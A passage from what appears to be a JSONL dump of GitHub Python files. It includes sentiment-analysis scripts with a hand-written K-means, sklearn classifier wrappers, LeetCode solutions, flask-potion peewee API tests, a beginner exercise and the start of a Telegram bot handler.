lst:\n #print(item)\n if item in positive_words:\n \n count = count + 1\n return count\n\n\nnegative_words = []\nwith open(\"negative_words.txt\") as pos_f:\n for lin in pos_f:\n if lin[0] != ';' and lin[0] != '\\n':\n negative_words.append(lin.strip())\nnegative_words.append('abrupt.')\n#print(negative_words)\ndef get_neg(str2):\n print(str2)\n str2 = str2.lower()\n #print(str2)\n counts = 0\n new_ls = str2.split()\n #print(new_ls)\n for item in new_ls:\n if item in negative_words:\n counts = counts + 1\n return counts\n\n\ndef results(result):\n\n result.write('Number of Retweets, Number of Replies, Positive Score, Negative Score, Net Score')\n result.write('\\n') \n file = project.readlines()\n headnot = file.pop(0)\n for line in file:\n lin = line.strip().split(',')\n lins = strip_punctuation(lin[0])\n result.write('{}, {}, {}, {}, {}'.format(lin[1],lin[2],get_pos(lins),get_neg(lins),(get_pos(lins)-get_neg(lins))))\n result.write('\\n')\n\n \nresults(result)\nproject.close()\nresult.close()\n \n","repo_name":"Techno-Philes/Sentiment-Analysis","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16097356349","text":"\"\"\"\n给定一个二叉树,判断其是否是一个有效的二叉搜索树。\n\n假设一个二叉搜索树具有如下特征:\n\n节点的左子树只包含小于当前节点的数。\n节点的右子树只包含大于当前节点的数。\n所有左子树和右子树自身必须也是二叉搜索树。\n示例 1:\n\n输入:\n 2\n / \\\n 1 3\n输出: true\n示例 2:\n\n输入:\n 5\n / \\\n 1 4\n  / \\\n  3 6\n输出: false\n解释: 输入为: [5,1,4,null,null,3,6]。\n  根节点的值为 5 ,但是其右子节点值为 4 。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/validate-binary-search-tree\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def isValidBST(self, root: TreeNode) -> bool:\n ans = []\n def recursion(root):\n if not root: return\n recursion(root.left)\n ans.append(root.val)\n recursion(root.right)\n recursion(root)\n # [1,1],去重用set\n return ans == sorted(ans) and len(set(ans)) == len(ans)\n\n def isValidBST(self, root: TreeNode) -> bool:\n # 利用中序遍历,下一个节点大于前一个节点,则为true\n p = root\n pre = None\n stack = []\n while p or stack:\n while p:\n stack.append(p)\n p = p.left\n p = stack.pop()\n if pre and p.val <= pre.val:\n return False\n pre = p\n p = p.right\n return True","repo_name":"algorithm004-02/algorithm004-02","sub_path":"Week 02/id_622/Leetcode-98-622.py","file_name":"Leetcode-98-622.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"zh","doc_type":"code","stars":34,"dataset":"github-code","pt":"40"} +{"seq_id":"36337196196","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 07 10:02:35 2016\n\n@author: fanqi\n\"\"\"\n\nimport numpy as np\nfrom sklearn.datasets import make_classification\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom pandas import DataFrame\nfrom sklearn.svm import LinearSVC, SVC\nfrom sklearn.learning_curve import learning_curve\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_selection import SelectKBest, f_classif\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.datasets import make_circles\nnp.set_printoptions(precision=4, threshold=10000, linewidth=160, edgeitems=999, suppress=True)\n\ndef createdata():\n X, y = make_classification(1000, n_features = 20, n_informative = 2, n_redundant = 2, n_classes = 2, random_state = 0)\n\n df = DataFrame( np.hstack((X, y[:, None])), columns = range(20) + ['class'] )\n return df\n\ndef preplot(df):\n _ = sns.pairplot(df[:50], vars = [8, 11, 12, 14, 19], hue = 'class', size = 1.5)\n plt.show()\n\n plt.figure(figsize = (12, 10))\n _ = sns.corrplot(df, annot = False)\n plt.show()\n\ndef plot_learning_curve(estimator, title, X, y, ylim = None, cv = None, train_sizes = np.linspace(0.1, 1.0, 5)):\n\n '''\n 画出data在某模型上的learning curve\n 参数解释\n -------------\n estimator:你用的分类器\n title:表格的标题\n X:输入的feature(numpy的array类型)\n y:输入的target vector\n ylim:tuple格式的(ymin, ymax),设定图像中纵坐标的最低点和最高点\n cv:做cross-validation的时候,数据分成的份数,其中一份作为cv集,其余n-1份作为training(默认为3份)\n -------------\n '''\n\n plt.figure()\n train_sizes, train_scores, test_scores = learning_curve(estimator, X, y, cv = 5, n_jobs = 1, train_sizes = train_sizes)\n train_scores_mean = np.mean(train_scores, axis = 1)\n train_scores_std = np.std(train_scores, axis = 1)\n test_scores_mean = np.mean(test_scores, axis = 1)\n test_scores_std = np.std(test_scores, axis = 1)\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std, train_scores_mean + train_scores_std, alpha = 0.1, color = 'r')\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std, test_scores_mean + test_scores_std, alpha = 0.1, color = 'g')\n plt.plot(train_sizes, train_scores_mean, 'o-', color = 'r', label = 'Training score')\n plt.plot(train_sizes, test_scores_mean, 'o-', color = 'g', label = 'Cross-validation score')\n\n plt.xlabel('Training examples')\n plt.ylabel('Score')\n plt.legend(loc = 'best')\n plt.grid('on')\n if ylim:\n plt.ylim(ylim)\n plt.title(title)\n plt.show()\n\n# plot_learning_curve(LinearSVC(C = 10.0), 'LinearSVC(C = 10.0)', X, y, ylim = (0.8, 1.01), train_sizes = np.linspace(0.05, 0.2, 5))\n# plot_learning_curve(LinearSVC(C = 10.0), 'LinearSVC(C = 10.0)', X, y, ylim = (0.8, 1.1), train_sizes = np.linspace(0.1, 1.0, 5))\n# plot_learning_curve(LinearSVC(C=10.0), \"LinearSVC(C=10.0) Features: 11&14\", X[:, [11, 14]], y, ylim=(0.8, 1.0), train_sizes=np.linspace(.05, 0.2, 5))\n# plot_learning_curve(Pipeline([('fs', SelectKBest(f_classif, k = 2)), ('svc', LinearSVC(C = 10.0))]), \\\n # 'SelectKBest(f_classif, k =2) + LinearSVC(C = 10.0)', X, y, ylim = (0.8, 1.0), train_sizes = np.linspace(0.05, 0.2, 5))\n# plot_learning_curve(LinearSVC(C = 0.1), 'LinearSVC(C = 0.1)', X, y, ylim = (0.8, 1.0), train_sizes = np.linspace(0.05, 0.2, 5))\n\n# estm = GridSearchCV(LinearSVC(), param_grid = {'C': [0.001, 0.01, 0.1, 1.0, 10.0]})\n# plot_learning_curve(estm, 'LinearSVC(C = AUTO)', X, y, ylim = (0.8, 1.0), train_sizes = np.linspace(0.05, 0.2, 5))\n# print 'Chosen parameter on 100 datapoints: %s' % estm.fit(X[:500], y[:500]).best_params_\n\n# plot_learning_curve(LinearSVC(C = 0.1, penalty = 'l1', dual = False), 'LinearSVC(C = 0.1, penalty = \"11\")', X, y, ylim = (0.8, 1.0), train_sizes = np.linspace(0.05, 0.2, 5))\n\n# estm = LinearSVC(C = 0.1, penalty = 'l1', dual = False)\n# estm.fit(X[:450], y[:450])\n# print 'Coefficients learned: %s' % estm.coef_\n# print 'Non-zero coefficients: %s' % np.nonzero(estm.coef_)[1]\n\nX, y = make_circles(n_samples = 1000, random_state = 2)\n# plot_learning_curve(LinearSVC(C = 0.25), 'LinearSVC(C = 0.25)', X, y, ylim = (0.4, 1.0), train_sizes = np.linspace(0.1, 1.0, 5))\ndf = DataFrame(np.hstack((X, y[:, None])), columns = range(2) + ['class'])\n_ = sns.pairplot(df, vars = [0, 1], hue = 'class', size = 3.5)\n\nX_extra = np.hstack((X, X[:, [0]] ** 2 + X[:, [1]] ** 2))\nplot_learning_curve(LinearSVC(C = 0.25), 'LinearSVC(C = 0.25) + distance feature', X_extra, y, ylim = (0.5, 1.0), train_sizes = np.linspace(0.1, 1.0, 5))\n\nplot_learning_curve(SVC(C = 2.5, kernel = 'rbf', gamma = 1.0), 'SVC(C = 2.5, kernel = \"rbf\", gamma = 1.0)', X, y, ylim = (0.5, 1.0), train_sizes = np.linspace(0.1, 1.0, 5))\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Fansiee/my_Titanic","sub_path":"hanxiaoyang.py","file_name":"hanxiaoyang.py","file_ext":"py","file_size_in_byte":4834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26528358524","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 11 23:11:07 2018\n\n@author: juliocesar\n\n\n\"\"\"\n\n# Libraries and Dependencies\n# -----------------------------------------------------------------------\n\nfrom sklearn.svm import LinearSVC #,SVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom xgboost.sklearn import XGBClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.preprocessing import MinMaxScaler\n\n\n# Global matrix variable\nX = None\n\n\n\n# Classifiers\n# -----------------------------------------------------------------------\n \n# SVM classifier\ndef svm(trl, trx, tsx, c):\n \"\"\"\n expecting two df with labels in col1 and 128 vec embedding\n takes label from first col name of df\n \"\"\"\n \n # Creating and training classifier \n classifier = LinearSVC(C = c).fit(trx, trl.ravel())\n \n # Making prediction on test set\n prediction = classifier.predict(tsx)\n return prediction\n\n\n# Random Forest Classifier\ndef rndForest(trl, trx, tsx,ntrees):\n \n # Creating and training classifier \n clf = RandomForestClassifier(n_estimators = ntrees).fit(trx, trl)\n \n # Making prediction on test set\n prediction = clf.predict(tsx)\n return prediction\n\n\n# Logistic Regression Classifier\ndef logReg(trl, trx, tsx, c):\n\n # Creating and training classifier\n try:\n \n clf = LogisticRegression(C = c).fit(trx, trl.ravel())\n except: #if multiclass..\n clf = LogisticRegression(C = c, solver='newton-cg', multi_class='multinomial').fit(trx, trl.ravel())\n # Making prediction on test set\n prediction = clf.predict(tsx)\n return prediction\n\n\n# Extreme Gradient Boost Classifier\ndef xgboost(trl, trx, tsx, md, ss, cs):\n \n # Creating and training classifier\n clf = XGBClassifier( max_depth = md, subsample = ss,\n colsample_bytree = cs).fit(trx, trl.ravel())\n \n # Making prediction on test set\n prediction = clf.predict(tsx)\n return prediction\n\n\n# Linear Discriminant Analysis Classifier\ndef lda(trl, trx, tsx):\n \n # Creating and training classifier\n clf = LinearDiscriminantAnalysis().fit(trx, trl.ravel())\n \n # Making prediction on test set\n prediction = clf.predict(tsx)\n return prediction\n\n\n# Quadratic Discriminant Analysis Classifier\ndef qda(trl, trx, tsx):\n # Creating and training classifier\n clf = QuadraticDiscriminantAnalysis().fit(trx, trl.ravel())\n \n # Making prediction on test set\n prediction = clf.predict(tsx) \n return prediction\n\n\n# Ada Boost Classifier\ndef adaboost(trl, trx, tsx, ne):\n\n # Creating and training classifier\n dt = DecisionTreeClassifier() \n clf = AdaBoostClassifier(n_estimators = ne, \n base_estimator = dt).fit(trx, trl.ravel())\n \n # Making prediction on test set\n prediction = clf.predict(tsx)\n return prediction\n\ndef naive_bayes(trl, trx, tsx):\n # Creating and training classifier\n scaler = MinMaxScaler()\n scaler.fit(trx)\n trx = scaler.fit_transform(trx)\n clf = MultinomialNB().fit(trx, trl.ravel())\n prediction = clf.predict(tsx)\n return prediction\n\ndef extra_trees(trl, trx, tsx, ne):\n #Creating and training classifier\n clf = ExtraTreesClassifier().fit(trx, trl.ravel())\n prediction = clf.predict(tsx)\n return prediction\n \n\n# Functions\n# -----------------------------------------------------------------------\n\n# Getter for global matrix\ndef getX():\n global X\n return X\n\n\n# Setter for global matrix\ndef setX(value):\n global X\n X = value\n \nclassifiers = [svm, rndForest, logReg, xgboost, lda, qda, adaboost]\n \n#def expt(classifiers):\n# \"\"\"\n# \"\"\"\n# for classifier in classifiers:\n# data = ","repo_name":"ajimenezjulio/text_classification","sub_path":"classifiersEdit.py","file_name":"classifiersEdit.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28188013270","text":"class Solution:\n def reverseString(self, s: List[str]) -> None:\n \"\"\"\n Do not return anything, modify s in-place instead.\n \"\"\"\n length = len(s)\n count = 0\n while count< len(s):\n s.insert(length,s[0])\n s.remove(s[0])\n count +=1\n length -= 1\n ","repo_name":"CengizhanDeveci/Competetive-Programming","sub_path":"leetcode/344. Reverse String.py","file_name":"344. Reverse String.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"321111533","text":"import unittest\n\nimport peewee as pw\nfrom playhouse.fields import ManyToManyField\n\nfrom flask_potion import Api, fields\nfrom flask_potion.contrib.peewee import PeeweeManager\nfrom flask_potion.resource import ModelResource\nfrom flask_potion.routes import Relation\nfrom tests import BaseTestCase\nfrom tests.contrib.peewee import PeeweeTestDB\n\n\nclass PeeweeTestCase(BaseTestCase):\n def setUp(self):\n super(PeeweeTestCase, self).setUp()\n self.app.config['DATABASE'] = 'sqlite://'\n self.db = db = PeeweeTestDB(self.app)\n self.api = Api(self.app)\n\n class Type(db.Model):\n name = pw.CharField(max_length=60, null=False, unique=True)\n\n class Machine(db.Model):\n name = pw.CharField(max_length=60, null=False)\n wattage = pw.FloatField(null=True)\n type = pw.ForeignKeyField(Type, related_name='machines')\n\n self.db.database.connect()\n self.db.database.create_tables([Type, Machine])\n\n class MachineResource(ModelResource):\n class Meta:\n model = Machine\n include_id = True\n include_type = True\n manager = PeeweeManager\n\n class Schema:\n type = fields.ToOne('type')\n\n class TypeResource(ModelResource):\n class Meta:\n model = Type\n include_id = True\n include_type = True\n manager = PeeweeManager\n\n class Schema:\n machines = fields.ToMany(MachineResource)\n\n self.MachineResource = MachineResource\n self.TypeResource = TypeResource\n\n self.api.add_resource(MachineResource)\n self.api.add_resource(TypeResource)\n\n def tearDown(self):\n self.db.database.close()\n\n def test_field_discovery(self):\n self.assertEqual(\n set(self.MachineResource.schema.fields.keys()),\n {'$id', '$type', 'name', 'type', 'wattage'})\n self.assertEqual(\n set(self.TypeResource.schema.fields.keys()),\n {'$id', '$type', 'name', 'machines'})\n self.assertEqual(self.MachineResource.meta.name, 'machine')\n self.assertEqual(self.TypeResource.meta.name, 'type')\n\n def test_create_no_json(self):\n response = self.client.post('/machine', data='invalid')\n self.assert400(response)\n\n def test_create_json_string(self):\n response = self.client.post(\n '/machine', data='invalid', force_json=True)\n self.assert400(response)\n\n def test_conflict(self):\n response = self.client.post('/type', data={'name': 'foo'})\n self.assert200(response)\n\n response = self.client.post('/type', data={'name': 'foo'})\n self.assertStatus(response, 409)\n\n def test_create(self):\n response = self.client.post('/type', data={})\n self.assert400(response)\n self.assertEqual({\n 'errors': [\n {\n 'message': \"'name' is a required property\",\n 'path': [],\n 'validationOf': {\n 'required': [\n 'name'\n ]\n }\n }\n ],\n 'message': 'Bad Request',\n 'status': 400\n }, response.json)\n\n response = self.client.post('/type', data={'name': 'x-ray'})\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'type',\n 'machines': [],\n 'name': 'x-ray'},\n response.json)\n\n response = self.client.post(\n '/machine', data={'name': 'Irradiator I', 'type': 1})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'machine',\n 'type': {'$ref': '/type/1'},\n 'wattage': None,\n 'name': 'Irradiator I'},\n response.json)\n\n response = self.client.post(\n '/machine', data={'name': 'Sol IV', 'type': 1, 'wattage': 1.23e45})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 2,\n '$type': 'machine',\n 'type': {'$ref': '/type/1'},\n 'wattage': 1.23e45,\n 'name': 'Sol IV'},\n response.json)\n\n response = self.client.get('/type/1')\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'type',\n 'machines': [\n {'$ref': '/machine/1'},\n {'$ref': '/machine/2'}],\n 'name': 'x-ray'},\n response.json)\n\n def test_get(self):\n def type_(i):\n return {\n '$id': i,\n '$type': 'type',\n 'name': 'Type-{}'.format(i),\n 'machines': []}\n\n for i in range(1, 10):\n response = self.client.post(\n '/type',\n data={'name': 'Type-{}'.format(i), 'machines': []})\n self.assert200(response)\n self.assertJSONEqual(type_(i), response.json)\n\n response = self.client.get('/type/{}'.format(i))\n self.assert200(response)\n self.assertJSONEqual(type_(i), response.json)\n\n response = self.client.get('/type')\n self.assert200(response)\n self.assertJSONEqual(\n [type_(i) for i in range(1, i + 1)],\n response.json)\n\n response = self.client.get('/type/{}'.format(i + 1))\n self.assert404(response)\n self.assertJSONEqual({\n 'item': {'$id': i + 1, '$type': 'type'},\n 'message': 'Not Found',\n 'status': 404},\n response.json)\n\n def test_pagination(self):\n for i in range(1, 51):\n response = self.client.post('/type', data={'name': 'T{}'.format(i)})\n self.assert200(response)\n\n response = self.client.get('/type')\n self.assert200(response)\n self.assertEqual('50', response.headers.get('X-Total-Count'))\n\n response = self.client.get('/type?where={\"name\": {\"$in\": [\"T1\", \"T5\", \"T6\"]}}')\n self.assert200(response)\n self.assertEqual('3', response.headers.get('X-Total-Count'))\n\n def test_update(self):\n response = self.client.post('/type', data={'name': 'T1'})\n self.assert200(response)\n\n response = self.client.post('/type', data={'name': 'T2'})\n self.assert200(response)\n\n response = self.client.post(\n '/machine', data={'name': 'Robot', 'type': 1})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'machine',\n 'type': {'$ref': '/type/1'},\n 'wattage': None,\n 'name': 'Robot'},\n response.json)\n\n response = self.client.patch('/machine/1', data={})\n self.assert200(response)\n\n response = self.client.patch('/machine/1', data={'wattage': 10000})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'machine',\n 'type': {'$ref': '/type/1'},\n 'wattage': 10000,\n 'name': 'Robot'},\n response.json)\n\n response = self.client.patch(\n '/machine/1', data={'type': {'$ref': '/type/2'}})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'machine',\n 'type': {'$ref': '/type/2'},\n 'wattage': 10000,\n 'name': 'Robot'},\n response.json)\n\n response = self.client.patch('/machine/1', data={'type': None})\n self.assert400(response)\n self.assertJSONEqual({\n 'errors': [{\n 'message': 'None is not valid under any of the given schemas',\n 'path': [\n 'type'],\n 'validationOf': {\n 'anyOf': [{\n 'additionalProperties': False,\n 'properties': {\n '$ref': {\n 'pattern': '^\\\\/type\\\\/[^/]+$',\n 'type': 'string'}},\n 'type': 'object'}, {\n 'type': 'integer'}]}}],\n 'message': 'Bad Request',\n 'status': 400},\n response.json)\n\n response = self.client.patch('/machine/1', data={'name': 'Foo'})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'machine',\n 'type': {'$ref': '/type/2'},\n 'wattage': 10000,\n 'name': 'Foo'},\n response.json)\n\n def test_delete(self):\n response = self.client.delete('/type/1')\n self.assert404(response)\n\n response = self.client.post(\n '/type', data={'name': 'Foo', 'machines': []})\n self.assert200(response)\n\n response = self.client.delete('/type/1')\n self.assertStatus(response, 204)\n\n response = self.client.delete('/type/1')\n self.assert404(response)\n\n\nclass PeeweeRelationTestCase(BaseTestCase):\n def setUp(self):\n super(PeeweeRelationTestCase, self).setUp()\n\n self.app.config['DATABASE'] = 'sqlite://'\n self.db = db = PeeweeTestDB(self.app)\n self.api = Api(self.app)\n\n class User(db.Model):\n parent = pw.ForeignKeyField('self', related_name='children',\n null=True)\n name = pw.CharField(max_length=60, null=False)\n\n class Group(db.Model):\n name = pw.CharField(max_length=60, null=False)\n members = ManyToManyField(User, related_name='memberships')\n\n db.database.connect()\n db.database.create_tables([\n User,\n Group,\n Group.members.get_through_model()])\n\n self.User = User\n self.Group = Group\n\n class UserResource(ModelResource):\n class Meta:\n model = User\n include_id = True\n include_type = True\n manager = PeeweeManager\n\n children = Relation('self')\n\n class GroupResource(ModelResource):\n class Meta:\n model = Group\n include_id = True\n include_type = True\n manager = PeeweeManager\n\n members = Relation('user')\n\n self.api.add_resource(UserResource)\n self.api.add_resource(GroupResource)\n\n def tearDown(self):\n self.db.database.drop_tables([\n self.Group.members.get_through_model(),\n self.Group,\n self.User])\n\n if not self.db.database.is_closed():\n self.db.database.close()\n\n def test_relationship_secondary(self):\n response = self.client.post('/group', data={'name': 'Foo'})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'group',\n 'name': 'Foo'},\n response.json)\n\n response = self.client.post('/user', data={'name': 'Bar'})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'user',\n 'name': 'Bar'},\n response.json)\n\n response = self.client.get('/group/1/members')\n self.assert200(response)\n self.assertJSONEqual([], response.json)\n\n response = self.client.post(\n '/group/1/members', data={'$ref': '/user/1'})\n self.assert200(response)\n self.assertJSONEqual({'$ref': '/user/1'}, response.json)\n\n response = self.client.get('/group/1/members')\n self.assert200(response)\n self.assertJSONEqual([{'$ref': '/user/1'}], response.json)\n\n def test_relationship_secondary_delete_missing(self):\n response = self.client.post('/group', data={\"name\": \"Foo\"})\n response = self.client.post('/user', data={\"name\": \"Bar\"})\n\n response = self.client.delete('/group/1/members/1')\n self.assertStatus(response, 204)\n\n def test_relationship_post(self):\n response = self.client.post('/user', data={'name': 'Foo'})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'user',\n 'name': 'Foo'},\n response.json)\n\n response = self.client.post('/user', data={'name': 'Bar'})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 2,\n '$type': 'user',\n 'name': 'Bar'},\n response.json)\n\n response = self.client.post(\n '/user/1/children', data={'$ref': '/user/2'})\n self.assert200(response)\n self.assertJSONEqual({'$ref': '/user/2'}, response.json)\n\n def test_relationship_get(self):\n self.test_relationship_post()\n\n response = self.client.get('/user/1/children')\n self.assert200(response)\n self.assertJSONEqual([{'$ref': '/user/2'}], response.json)\n\n def test_relationship_delete(self):\n self.test_relationship_post()\n\n response = self.client.delete('/user/1/children/2')\n self.assertStatus(response, 204)\n\n response = self.client.get('/user/1/children')\n self.assert200(response)\n self.assertJSONEqual([], response.json)\n\n def test_relationship_pagination(self):\n response = self.client.post('/user', data={'name': 'Foo'})\n self.assert200(response)\n\n for i in range(2, 50):\n response = self.client.post('/user', data={'name': str(i)})\n self.assert200(response)\n response = self.client.post(\n '/user/1/children',\n data={'$ref': '/user/{}'.format(response.json['$id'])})\n self.assert200(response)\n\n response = self.client.get('/user/1/children')\n\n self.assert200(response)\n self.assertEqual('48', response.headers.get('X-Total-Count'))\n self.assertJSONEqual(\n [{'$ref': '/user/{}'.format(i)} for i in range(2, 22)],\n response.json)\n\n response = self.client.get('/user/1/children?page=3')\n self.assert200(response)\n self.assertEqual('48', response.headers.get('X-Total-Count'))\n self.assertJSONEqual(\n [{'$ref': '/user/{}'.format(i)} for i in range(42, 50)],\n response.json)\n","repo_name":"biosustain/potion","sub_path":"tests/contrib/peewee/test_manager_peewee.py","file_name":"test_manager_peewee.py","file_ext":"py","file_size_in_byte":14415,"program_lang":"python","lang":"en","doc_type":"code","stars":489,"dataset":"github-code","pt":"40"} +{"seq_id":"74630284281","text":"#Additional bonus points are awarded as per the rules described below.\n# Write a program that calculates the bonus points for the given number and outputs the total points including the bonus.\n#If the number is up to 100 inclusive, the bonus points are 5.\n#If the number is larger than 100, the bonus points are 20% of the number.\n#If the number is larger than 1000, the bonus points are 10% of the number.\n#Additional points are awarded as below (added separately from the described above):\n##For even numbers -> + 1 p.\n##For numbers, ending with 5 -> + 2 p.\n\npoints = int(input())\nbonus = 0\n\nif points > 1000:\n bonus = 0.1 * points\nelif points > 100: #\"if the previous conditions were not true, then try this condition\"\n bonus = 0.2 * points\nelif points <= 100:\n bonus = 5\n\nif points % 2 == 0:\n bonus = bonus + 1\n\nif str(points).endswith('5'):\n bonus = bonus + 2\n\nprint(bonus)\nsum = bonus + points\nprint(sum)","repo_name":"astefa69/SoftUni_Python_Problems","sub_path":"Python_Basics_Course/02_if_else_statements/lab/06_bonus_score.py","file_name":"06_bonus_score.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16586659278","text":"\n# coding: utf-8\n\n# # Question_1\n\n# ### import lib\n\n# In[2]:\n\nfrom nltk.stem import WordNetLemmatizer\nimport numpy as np\nimport random\nfrom sklearn.linear_model import LogisticRegression as LGR\nfrom sklearn.cluster import KMeans\n\n\n# ### PreProcess data\n\n# In[3]:\n\n\"\"\"\ntrain_data includes 2400 samples, where each sample is a list including the\nelements which are the words in reviews.\n\ntrain_label includes 2400 samples which belongs to {0,1}, which is the label \nof train_data.\n\ntest_data has the same form as the train_data, while it has 600 sample.\n\ntest_label is the same as train_label.\n\"\"\"\ndef Split(filenames):\n\n train_data = []\n train_label = []\n test_data = []\n test_label = []\n root = \"sentiment labelled sentences/\"\n for filename in filenames:\n path = root + filename\n count = [1,1]\n punctuation = [\"!\",\"%\",\"&\",\"(\",\")\",\"+\",\".\",\":\",\";\",\"<\",\"=\",\">\",\"?\",\"*\",\",\",\"\\t\",\"\"]\n for line in open(path):\n if line[-1] == \"\\n\":\n line = line[:-1]\n a = int(line[-1])\n b=[]\n for word in line[:-1].split(' '):\n ##while word and word[-1] in punctuation:\n ##word = word[:-1]\n ##b.append(wordnet_lemmatizer.lemmatize(word.lower()))\n i = 0\n while i < len(word):\n if word[i] in punctuation:\n word = word[:i]+word[i+1:]\n else:\n i+=1\n c = word.lower()\n if c == \"and\" or c == \"or\" or c==\"\":\n continue\n b.append(c)\n if count[a] > 400:\n test_label.append(a)\n test_data.append(b)\n else:\n train_label.append(a)\n train_data.append(b)\n count[a]+=1\n return [train_data, train_label, test_data, test_label]\n\n\n# In[4]:\n\n[train_data, train_label, test_data, test_label] = Split([\"yelp_labelled.txt\",\"amazon_cells_labelled.txt\",\"imdb_labelled.txt\"])\n\n\n# ## Bag of Words \n\n# In[5]:\n\n\"\"\"\ndic is a dictionary where key is the word shows in train_data and the items\nof is a list with two elements, first one is the frequency of the key and \nsecond element is the index of the key in feature vector, which we will use\nafter.\n\"\"\"\ndef bagOfWord(data):\n dic = {}\n t = 0\n n = 0\n for dataset in data:\n for line in dataset:\n for word in line:\n if word in dic:\n dic[word][0] += 1\n elif t == 0:\n dic[word] = [1,n]\n n+=1\n t = 1\n return dic\n\n\n# In[6]:\n\nDic = bagOfWord([train_data, test_data])\nlen(Dic)\n\n\n# In[127]:\n\n\"\"\"Build feature vector.\"\"\"\ndef buildB(data, dic):\n data_b = []\n size_dic = len(dic)\n for line in data:\n temp = [0]*size_dic\n for word in line:\n if word in dic:\n temp[dic[word][1]]+=1.0\n data_b.append(np.array(temp))\n return data_b\n \n\n\n# In[128]:\n\nget_ipython().magic('time [train_data_b, test_data_b] = [buildB(train_data,Dic), buildB(test_data,Dic)]')\n\n\n# ### postprocess feature vectors\n\n# In[129]:\n\n\"\"\"\nl^2 normalization\n\"\"\"\ndef l2normalize(data):\n for vector in data:\n L = np.linalg.norm(vector)\n vector /= L\n \ndef standardize(data_b, size_dic):\n s = np.array([0.0]*size_dic)\n for bite in data_b:\n s += bite\n s_ = s/len(data_b)\n vec = []\n for bit in data_b:\n vec.append(bit - s_)\n return vec\n\n\n# In[130]:\n\n\"\"\"\ntrain_vec and test_vec will be the feature vector to be used for future.\n\"\"\"\nl2normalize(train_data_b), l2normalize(test_data_b)\n[train_vec, test_vec] = [standardize(train_data_b,len(Dic)), standardize(test_data_b,len(Dic))]\n\n\n# ### K-means\n\n# In[119]:\n\n\"\"\"\nrandomly pick two points in sample set to be initial points\nlabel is a list indicate which cluster the vector is signed to.\np is the list including two mean point that the model converget to.\nDuring the function, it first prints which two points function pick as\ninitial points and then how many time it iterates.\n\"\"\"\ndef KMeans_2(data,size_dic):\n ##p = kmeans.cluster_centers_\n ##label = kmeans.labels_\n a = random.randint(0,len(data)-1)\n b = random.randint(0,len(data)-1)\n while a==b:\n b = random.randint(0,len(data)-1)\n p = np.array([data[a], data[b]])\n print(\"point_init1 is \",a)\n print(\"point_init2 is \",b)\n label = [0]*len(data)\n conver = False\n count = 0\n while not conver:\n count += 1\n conver = True\n for i in range(len(data)):\n d = [0]*2\n d[0] = np.linalg.norm(p[0]-data[i])\n d[1] = np.linalg.norm(p[1]-data[i])\n if d[label[i]] > d[1-label[i]]:\n conver = False\n label[i] = 1-label[i]\n if not conver:\n ##print(\"a\")\n for j in [0,1]:\n n_p = 0\n s_p = np.array([0.0]*size_dic)\n for point in range(len(label)):\n if label[point] == j:\n s_p += data[point]\n n_p += 1\n p[j] = s_p/n_p\n print(\"iterate time is \",count)\n return(label, p)\n\n\n# In[120]:\n\ndef n_kmeans(vec, k_train_label,kmeans_lib,size):\n [k_label, k_p]=KMeans_2(vec, size)\n n_bruce = 0\n n_python = 0\n for i in range(len(k_label)):\n if k_train_label[i] == kmeans_lib.labels_[i]:\n n_python+=1\n if k_train_label[i] == k_label[i]:\n n_bruce+=1\n print(\"self-designed accuracy is\",n_bruce/len(k_label))\n print(\" lib accuracy is\", n_python/len(k_label))\n print(\"higher than lib?: \",n_python/len(k_label){title}\\n\"\n f\"(вы можете скопировать исходный текст нажав на него)\",\n reply_markup=get_cancel_button())\n msg_id = callback.message.message_id\n await state.update_data(msg=msg_id)\n elif action==\"content\":\n content = data[\"content\"]\n await state.set_state(Edit.content)\n await callback.message.edit_text(f\"Напишите исправленный текст.\\n\"\n f\"{content}\\n\"\n f\"(вы можете скопировать исходный текст 